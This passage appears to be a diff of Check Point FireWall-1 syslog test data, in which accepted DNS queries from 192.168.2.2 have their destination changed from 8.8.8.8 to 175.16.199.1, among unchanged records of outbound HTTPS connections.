FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58518"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36943"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34432"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38554"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58518"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44896"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35443"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35443"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53256"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52753"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34408"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52753"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34408"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38664"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48061"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48061"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.169"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51666"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] -<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49360"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53810"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49853"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60716"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49360"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53810"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49853"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60716"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53262"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55657"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42674"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55657"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & 
